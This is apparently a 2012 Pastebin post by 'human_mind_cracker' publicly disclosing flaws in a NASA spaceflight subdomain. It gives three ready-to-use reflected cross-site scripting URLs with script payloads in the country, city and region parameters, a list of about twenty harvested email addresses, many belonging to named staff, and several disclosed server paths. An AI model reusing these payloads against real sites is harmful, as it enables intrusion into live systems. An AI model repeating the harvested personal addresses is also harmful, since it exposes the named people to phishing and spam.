Advertisement
human_mind_cracker

Report1: Nasa

Oct 28th, 2012
772
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.16 KB | None | 0 0
  1. ************************ Vulnerabilities on Nasa subdomain *********************************
  2.  
  3. [*]Target: http://spaceflight.nasa.gov
  4.  
  5. [**] XSS:
  6.  
  7. http://spaceflight.nasa.gov/realdata/sightings/cities/view.cgi?country=Laos&region=None&city=%22%3Cscript%3EXSS%20vulnerabilities%20found%20by%20human%20mind%20cracker%3C/script%3E%3E%20HTTP/1.1
  8.  
  9. http://spaceflight.nasa.gov/realdata/sightings/cities/view.cgi?region=None&city=Vientiane&country=%22'%3CcJzI5%3EXSS%20found%20by%20human%20mind%20cracker
  10.  
  11. http://spaceflight.nasa.gov/realdata/sightings/cities/view.cgi?country=Laos&city=Vientiane&region=%22'%3CcJzI5%3EXSS%20found%20by%20human%20mind%20cracker
  12.  
  13. [**] Email Leaked:
  14.  
  15. jsc-hsfwebma@mail.nasa.gov
  16. HSFWebMa@ems.jsc.nasa.gov
  17. william.h.tracy@nasa.gov
  18. listserv@listserver.jsc.nasa.gov
  19. francis.a.cucinotta@nasa.gov
  20. walter.schimmerling@hq.nasa.gov
  21. majordomo@listserver.jsc.nasa.gov
  22. frank.m.sulzman@nasa.gov
  23. domo@hq.nasa.gov
  24. majordomo@amsat.org
  25. na6sa-nasa-dryden@mail.nasa.gov
  26. mallard@mail.arc.nasa.gov
  27. glenn.l.williams@grc.nasa.gov
  28. Fred.A.Minetto@nasa.gov
  29. mark.m.schaefer@jpl.nasa.gov
  30. no6b@no6b.jpl.nasa.gov
  31. kyle.brewer@nasa.gov
  32. nicholas.lance1@jsc.nasa.gov
  33. james.e.byrd@nasa.gov
  34. don.hediger@nasa.gov
  35. Charles.R.Jacob.1@gsfc.nasa.gov
  36. kg5u@hal-pc.org
  37.  
  38. [**] Path Disclosure:
  39.  
  40. Various system paths were disclosed within the application client source code or other files. This information could be used by attackers to make an educated guess about the application environment and any inherited weaknesses that may come with it.
  41.  
  42. path: /home/index.html ...
  43. path: /home/hqnews/2004/oct/HQ_04336_neemo7.html ...
  44. path: /Home/hm_b_wel1.gif ...
  45. path: /Home/hm_b_his1.gif ...
  46. path: /Home/hm_b_sci1.gif ...
  47. path: /Home/hm_b_space1.gif ...
  48. path: /Home/hm_b_peop1.gif ...
  49. path: /Home/hm_b_ref1.gif ...
  50. path: /Home/hm_b_mm1.gif ...
  51. path: /Home/hm_b_wel2.gif ...
  52. path: /Home/hm_b_his2.gif ...
  53. path: /Home/hm_b_sci2.gif ...
  54. path: /Home/hm_b_space2.gif ...
  55. path: /Home/hm_b_peop2.gif ...
  56. path: /Home/hm_b_ref2.gif ...
  57. path: /Home/hm_b_mm2.gif ...
  58.  
  59.  
  60.  
  61.  
  62. [*****]Picture When i Found the XSS vulnerabilitie:
  63. http://www.imagup.com/data/1166121656.html
  64.  
  65.  
  66. Human Mind Cracker (^_^)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement